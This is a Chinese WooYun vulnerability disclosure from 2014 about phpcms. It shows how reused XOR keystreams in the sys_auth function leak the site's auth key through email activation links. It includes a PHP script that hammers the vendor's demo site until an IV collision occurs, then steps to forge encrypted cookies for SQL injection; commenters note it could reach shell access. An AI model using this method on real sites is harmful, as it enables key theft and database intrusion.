当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066138

漏洞标题:phpcms最新版绕过全局防御暴力注入(官网演示)

相关厂商:phpcms

漏洞作者: 索马里的海贼

提交时间:2014-06-25 08:23

修复时间:2014-09-20 08:24

公开时间:2014-09-20 08:24

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-25: 细节已通知厂商并且等待厂商处理中
2014-06-30: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-08-24: 细节向核心白帽子及相关领域专家公开
2014-09-03: 细节向普通白帽子公开
2014-09-13: 细节向实习白帽子公开
2014-09-20: 细节向公众公开

简要描述:

加解密函数缺陷第三发,注入演示
版本20140522
无视全局防御
搬个沙发吧。。这个比destoon那个要麻烦多了。。。

详细说明:

先从函数说起
phpcms/libs/functions/global.func.php行335

function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) {
	$key_length = 4;
	$key = md5($key != '' ? $key : pc_base::load_config('system', 'auth_key'));
	$fixedkey = md5($key); //keya 用于加解密
	$egiskeys = md5(substr($fixedkey, 16, 16)); //keyb 用于数据完整性校验
	$runtokey = $key_length ? ($operation == 'ENCODE' ? substr(md5(microtime(true)), -$key_length) : substr($string, 0, $key_length)) : ''; //keyc(初始化向量iv)
	$keys = md5(substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));//由keya和heyc组合而成 直接参与运算,这里叫keyd吧
	$string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length));
	$i = 0; $result = '';
	$string_length = strlen($string);
	for ($i = 0; $i < $string_length; $i++){
		$result .= chr(ord($string{$i}) ^ ord($keys{$i % 32})); //简化了dz的函数 直接用keyd和文本做异或
	}
	if($operation == 'ENCODE') {
		return $runtokey . str_replace('=', '', base64_encode($result));
	} else {
		if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$egiskeys), 0, 16)) {
			return substr($result, 26);
		} else {
			return '';
		}
	}
}


这里用的其实是简化版的经典加密函数auth_code由DZ开始广泛用于各类cms
这里去掉了密钥簿的生成和转换 直接用kaya和keyc组合md5之后的值keyd作为密钥簿然后与原始文本处理后的数据进行异或。
讲加密过程有点绕,我也没有刺总的口才能把这个函数说那么细,反正这里知道一点就够了
如果知道原始文本和加密后的文本,而且原始文本的长度够长(准确说是明文内容的长度大于32*2-10-16=38位),是可以逆推出keyd的。
在这个函数中,keyc 就是IV(初始化向量), ckey_length 就是IV的长度:4。keyc影响到每次加密的xor key(也就是keyd)。这里先说这么多,先来看看phpcms的问题
/phpcms/modules/memeber/index.php行176

if($member_setting['enablemailcheck']) {
	pc_base::load_sys_func('mail');
	$phpcms_auth_key = md5(pc_base::load_config('system', 'auth_key'));
	$code = sys_auth($userid.'|'.$phpcms_auth_key, 'ENCODE', $phpcms_auth_key);
	$url = APP_PATH."index.php?m=member&c=index&a=register&code=$code&verify=1";


在注册过程中 如果后台配置了需要邮件认证,那么就会进入这个if生成一串校验值发往注册的邮箱。

$phpcms_auth_key = md5(pc_base::load_config('system', 'auth_key'));


这个auth_key其实就是核心加密key,这里居然把md5后的核心key作为参数的一部分写入激活链接发到用户邮箱了。如果能够解开激活链接中的这个code值,我们就可以得到加密key从而任意生成加密串了。参数$code生成方式为

sys_auth($userid.'|'.$phpcms_auth_key, 'ENCODE', $phpcms_auth_key);


sys_auth()用的密钥为md5('auth_key');
收到邮件中的链接如下

1.jpg


code值为d104CAgCBwZUAVYFVVIBAAVVVwldAAYEXQoNUQAKSFECWgAIAApUUlZUUQJTUlZRAA9UAQFRDABWX10FVVtV
前4位为keyc 这里是"d104"
如果我们能找到另外一处明文和密文都可知 且可以多次用同一明文获取密文的位置 就能通过遍历找出相同的keyc,当keyc相同时 xor key也相同,所以我们就能用前面说方法逆推出keyd来解密出code的内容。
首先是找到一处同样用md5(pc_base::load_config('system', 'auth_key'))作为密钥,且我们可以同时知道明文和密文的地方。
/phpcms/modules/content/down.php 行76

if(strpos($f, 'http://') !== FALSE || strpos($f, 'ftp://') !== FALSE || strpos($f, '://') === FALSE) {
	$pc_auth_key = md5(pc_base::load_config('system','auth_key').$_SERVER['HTTP_USER_AGENT']);
	$a_k = urlencode(sys_auth("i=$i&d=$d&s=$s&t=".SYS_TIME."&ip=".ip()."&m=".$m."&f=$f&modelid=".$modelid, 'ENCODE', $pc_auth_key));
	$downurl = '?m=content&c=down&a=download&a_k='.$a_k;
} else {
	$downurl = $f;			
}


当我们把user-agent置空的时候
$pc_auth_key正好就是我们需要的 

md5(pc_base::load_config('system','auth_key')."");


加密的字符串为

"i=$i&d=$d&s=$s&t=".SYS_TIME."&ip=".ip()."&m=".$m."&f=$f&modelid=".$modelid


$i就是下载的id 从页面可以获得$d是downloadtype 一般是1 $s空 $t是时间。可以从http头获取到$ip可知 $m为1 $f是下载文件的url 这里长度肯定超过38了。
先来获取邮件中的code,为了增加碰撞的概率 这里用多个邮箱多次获取了激活链接并收集激活链接中参数code的前4位(IV)记录下来。

2.jpg


3.jpg


4.jpg


先来写一个小脚本来碰撞IV

<?php
$url = "http://www.phpcms.cn/index.php?m=content&c=down&a_k=f7c8BFEHCVEIBVYGVQJYB1ADXFNSAAxRAgcHDw5eDlMCR0oJR1oEUB5TW14RFREMHB9cWhRdWQ4CBRxHUEdQC0BPWlpOQQBOARtTGRUJEVVeQ2dDWh0AT1U%2BZ2N%2BDx0cWhEfUFwHHwxXUQNaDAVcBRVTWUEKVwhQWg";
$reg = '#a_k=(.*?)\"#';
$code  = array('7763','2bc5','8706','81b7','30a9','49e7','8731','9c2e','d007');
$i=0;
for(;;){
	$data = doGet($url);
	preg_match_all($reg, $data, $urls);	
	if (in_array(substr($urls[1][0],0,4), $code)){
		die($urls[1][0]);
	}
	$i++;
	echo $i."--".substr($urls[1][0],0,4)."\n";
}
function doGet($url,$cookie=''){
	$ch = curl_init(); 
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	$response = curl_exec($ch);
	curl_close($ch);
	return $response;
}
?>


简单说一下脚本
第一段地址来自http://www.phpcms.cn/index.php?m=content&c=index&a=show&catid=19&id=51中的下载链接
code来自上一步的收集
脚本会不停请求页面并收集下载链接,当iv碰撞成功时停止脚本并输出原始下载链接
运气不错,1000多次请求就碰撞成功了

5.jpg


7763VFRVVlMAVQEJB1MGAgYFUwIPVlQDBlcEB1ALCgVVRFRZVEMVXhYRDAgDAFBVBAdUDQESCEIKV1dXHVMPA0pTBVZKVFdUFggMCBFWXgtCRhMPGBsFXUAICg1SBhlADBJTCRdLBQ0fEwgWDh5WTEZaE1ZaRz5EDkhTTAU9YmQiWh4eDRVADl8BVFVeVF5Q
去掉前面的IV 7763 填入exp中来计算keyb

6.jpg


注意图中的key 前面有10位的0和16位的1 正常流程中 前10位是时间戳后面16位是数据完整性校验的MD5,这里我们没法知道 所以用0和1来填充,因为是按位异或的所以前面有点错没关系。只要后面可以确认的数据段足够长 就能还原出正确的keyd
如图跑完后得到的数据为

ddefc0e197b7374b3>ge27f56ab70db0deefc0e1970cc61f?74a27ffb3b70db0ddefc0e1970cc62c574a27ffb3b70db0ddefc0e1970cc62c574a27ffb3b70db0dde


按32位长度分段得到

ddefc0e197b7374b3>ge27f56ab70db0
deefc0e1970cc61f?74a27ffb3b70db0
ddefc0e1970cc62c574a27ffb3b70db0
ddefc0e1970cc62c574a27ffb3b70db0
dde


可以看到前面两段都有点不一样 后面两段就相同了 因为后面两段是明确的明文。
到这里已经拿到了IV是7763时的keyd:ddefc0e1970cc62c574a27ffb3b70db0
我们来拿这个keyd解密一下邮箱中的激活链接试试
找到7763开头的激活链接

7.jpg


去掉开头4位IV 将绿色部分写入exp
keyd为上一步获得的ddefc0e1970cc62c574a27ffb3b70db0

8.jpg


成功解开了,这里|后面的就是我们朝思暮想的
md5(pc_base::load_config('system','auth_key'))了

漏洞证明:

拿到这个key之后就能干很多事了。这里以一个简单的注入来证明一下
/api/add_favorite.php行26

$phpcms_auth = param::get_cookie('auth');
if($phpcms_auth) {
	$auth_key = md5(pc_base::load_config('system', 'auth_key').$_SERVER['HTTP_USER_AGENT']);
	list($userid, $password) = explode("\t", sys_auth($phpcms_auth, 'DECODE', $auth_key));
	if($userid >0) {
	} else {
		exit(trim_script($_GET['callback']).'('.json_encode(array('status'=>-1)).')');
	} 
} else {
	exit(trim_script($_GET['callback']).'('.json_encode(array('status'=>-1)).')');
}
$favorite_db = pc_base::load_model('favorite_model');
$data = array('title'=>$title, 'url'=>$url, 'adddate'=>SYS_TIME, 'userid'=>$userid);
//根据url判断是否已经收藏过。
$is_exists = $favorite_db->get_one(array('url'=>$url, 'userid'=>$userid));


userid来自cookie cookie是加密过的 所以无视GPC 无视任何防御
使用上一步得到的key来生成exp

10.jpg


将生成的验证串填入cookie xxxx_auth中并访问
http://www.phpcms.cn/api.php?op=add_favorite&title=asdf&url=asdf
页面直接返回错误信息爆出版本号

9.jpg


修复方案:

你们比我专业

版权声明:转载请注明来源 索马里的海贼@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-09-20 08:24

厂商回复:

漏洞Rank:20 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2014-06-25 08:28 | 微尘 ( 普通白帽子 | Rank:218 漏洞数:74 )

    前排沙发。

  2. 2014-06-25 08:32 | roker ( 普通白帽子 | Rank:357 漏洞数:108 )

    关注

  3. 2014-06-25 08:38 | 乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )

    死黑阔 这么早

  4. 2014-06-25 08:54 | 大大灰狼 ( 普通白帽子 | Rank:248 漏洞数:53 | Newbie)

    打雷了

  5. 2014-06-25 09:03 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)

    我勒个擦

  6. 2014-06-25 09:07 | 郭斯特 ( 普通白帽子 | Rank:181 漏洞数:69 | GhostWin)

    火钳留名!!!

  7. 2014-06-25 09:09 | what_news ( 普通白帽子 | Rank:195 漏洞数:48 | 小菜一个 希望成为大菜)

    暴力男

  8. 2014-06-25 09:17 | pandas ( 普通白帽子 | Rank:585 漏洞数:58 | 国家一级保护动物)

    mark下

  9. 2014-06-25 09:22 | xfkxfk 认证白帽子 ( 核心白帽子 | Rank:2179 漏洞数:338 | 呵呵!)

    哟,又一发,给力

  10. 2014-06-25 09:24 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    据说今天有雷阵雨

  11. 2014-06-25 09:24 | Moc ( 路人 | Rank:23 漏洞数:12 | 屌丝何苦为难屌丝)

    mark

  12. 2014-06-25 09:29 | c0lc ( 路人 | Rank:0 漏洞数:1 | 小牛牛说,要打死你)

    我就拉个擦

  13. 2014-06-25 09:54 | felixk3y ( 普通白帽子 | Rank:523 漏洞数:41 | php python jsp)

    楼主没有将其最大化啊,为何不将其用来getshell呢

  14. 2014-06-25 10:00 | Neeke ( 普通白帽子 | Rank:101 漏洞数:24 | 求传授刷Rank方法?)

    被雷劈了

  15. 2014-06-25 10:07 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

    下雨了

  16. 2014-06-25 10:25 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  17. 2014-06-25 10:31 | mramydnei ( 普通白帽子 | Rank:348 漏洞数:80 )

    鲁大师就是叼 也不带带我

  18. 2014-06-25 10:32 | 裙下的秘密 ( 实习白帽子 | Rank:83 漏洞数:9 | )

    围观。

  19. 2014-06-25 13:00 | 醉青丝 ( 路人 | Rank:11 漏洞数:2 | null)

    期待犀利思路

  20. 2014-06-25 13:48 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    鲁大师就是叼 也不带带我

  21. 2014-06-27 17:18 | phith0n 认证白帽子 ( 核心白帽子 | Rank:656 漏洞数:107 | 一个想当文人的黑客~)

    这个我准备放着暑假研究的,妈蛋被你弄了!!!

  22. 2014-06-27 17:18 | phith0n 认证白帽子 ( 核心白帽子 | Rank:656 漏洞数:107 | 一个想当文人的黑客~)

    这个可以getshell的。。。

  23. 2014-06-30 11:38 | Map ( 普通白帽子 | Rank:154 漏洞数:10 | 闭关几个星期,学点东西。)

    你果不其然是悲剧了,下一个便是我了。

  24. 2014-06-30 15:11 | Lonely ( 实习白帽子 | Rank:72 漏洞数:27 | 人生如梦,始终都游不过当局者迷的悲哀。)

    忽略了 咋还不让瞧啊。。。。。。。。。。。。。。。。。。。

  25. 2014-08-06 13:14 | Neeke ( 普通白帽子 | Rank:101 漏洞数:24 | 求传授刷Rank方法?)

    牛逼带闪电

  26. 2014-08-18 14:44 | 廷廷 ( 路人 | Rank:0 漏洞数:1 | 有很强的好奇心,爱好广泛,求女女带走。。...)

    牛逼 !!!思路膜拜···

  27. 2014-08-20 20:26 | kimdle ( 路人 | Rank:0 漏洞数:1 | @kimdle)

    是误报吗?得到了authkey,无法解密原来的cookie啊

  28. 2014-08-21 09:23 | kimdle ( 路人 | Rank:0 漏洞数:1 | @kimdle)

    @phith0n 求详情啊

  29. 2014-09-20 09:44 | 黑色的屌丝 ( 路人 | Rank:27 漏洞数:5 | →_→→_→)

    我是第100个关注者。。。占楼

  30. 2014-09-20 17:43 | sutdy ( 普通白帽子 | Rank:101 漏洞数:33 | 0.0)

    我操 nb啊

  31. 2015-04-17 14:16 | Manning ( 普通白帽子 | Rank:559 漏洞数:78 | 就恨自己服务器太少)

    我也在当时的版本试了下,_auth传入了经过加密的值,$phpcms_auth = param::get_cookie('auth');这句无法获取$phpcms_auth;